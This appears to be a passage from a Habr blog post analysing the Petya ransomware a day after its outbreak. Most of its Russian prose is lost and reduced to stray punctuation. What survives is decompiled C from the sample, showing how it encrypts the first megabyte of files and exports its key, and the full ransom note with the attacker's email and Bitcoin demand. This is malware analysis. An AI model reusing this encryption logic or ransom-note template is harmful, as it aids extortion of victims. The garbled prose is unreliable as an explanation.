Сутки после вируса Petya

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, . 10-12 .

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( 13-00 27- ), , , . .

5- .


→ h**ps://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 — .
→ h**ps://retdec.com/decompilation-run/ — .

— , windows , .


1. 1 (0x100000) . — 1- :

        // 0x100018da
        if (v6 <= lpFileMappingAttributes) {
            if (lpFileSize <= 0x100000) {  //   
                // 0x10001958
                dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize;
                pdwDataLen = dwNumberOfBytesToMap;
                dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1);
                // branch -> 0x100018eb
                // 0x100018eb
                hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes);
                dwFileOffsetHigh = lpFileMappingAttributes;
                if ((int32_t)hFileMappingObject != dwFileOffsetHigh) {
                    // 0x100018ff
                    pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap);
                    v4 = (int32_t)pbData;
                    hFile2 = v4;
                    hHash = lpFileMappingAttributes;
                    if (v4 != hHash) {
                        // 0x10001913
                        hKey = *(int32_t *)(a2 + 20);
                        v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow);
                        if (v5) {
                            // 0x1000192e
                            FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen);
                            // branch -> 0x10001938
                        // 0x10001938
                        UnmapViewOfFile((char *)hFile2);
                        // branch -> 0x1000193f
                    // 0x1000193f
                    // branch -> 0x10001948
                // 0x10001948
                handleClosed = CloseHandle(hFile);
                // branch -> 0x10001951
                // 0x10001951
                g8 = v1;
                g4 = v3;
                return (char *)handleClosed;
        // 0x100018e6
        pdwDataLen = (struct _LARGE_INTEGER *)0x100000; //         1 
        struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes;
        lpFileMappingAttributes2 = v8;
        v7 = v8;
        dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000;
        dwMaximumSizeLow = 0x100000;
        // branch -> 0x100018eb

, .

2. . README.TXT , , ( ). .

Ooops, your important files are encrypted.

If you see this text, then your files are no longer accessible, because
they have been encrypted. Perhaps you are busy looking for a way to recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.

We guarantee that you can recover all your files safely and easily.
All you need to do is submit the payment and purchase the decryption key.

Please follow the instructions:

1. Send $300 worth of Bitcoin to following address:


2. Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.
Your personal installation key:



void function_10001c7f(void) {
    int32_t dwFlags = 0; // ebx
    int32_t hKey = *(int32_t *)(g3 + 20); // 0x10001ca0
    int32_t pdwDataLen = 0;
    int32_t v1;
    if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) {
        // 0x10001d2a
        g3 = (int32_t)NULL;
        g4 = v1;
    char * memoryHandle = LocalAlloc(64, pdwDataLen); // 0x10001cb1
    if ((int32_t)memoryHandle == dwFlags) {
        // 0x10001d2a
        g3 = (int32_t)NULL;
        g4 = v1;
    int32_t hExpKey = *(int32_t *)(g3 + 12); // 0x10001cc6
    int32_t hKey2 = *(int32_t *)(g3 + 20); // 0x10001cc9
    if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) {
        int32_t pcchString = dwFlags;
        bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString); // 0x10001ce8
        if (v2) {
            char * memoryHandle2 = LocalAlloc(64, 2 * pcchString); // 0x10001cf6
            int32_t hMem = (int32_t)memoryHandle2; // 0x10001cf6_6
            if (hMem == dwFlags) {
                // 0x10001d21
                // branch -> 0x10001d2a
                // 0x10001d2a
                g3 = (int32_t)NULL;
                g4 = v1;

CryptExportKey — 1, . README.TXT.

— , ? . , .

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— , , , . 160-180 . , . 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX 10000$. , , , .

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Source: https://habr.com/ru/post/J331978/

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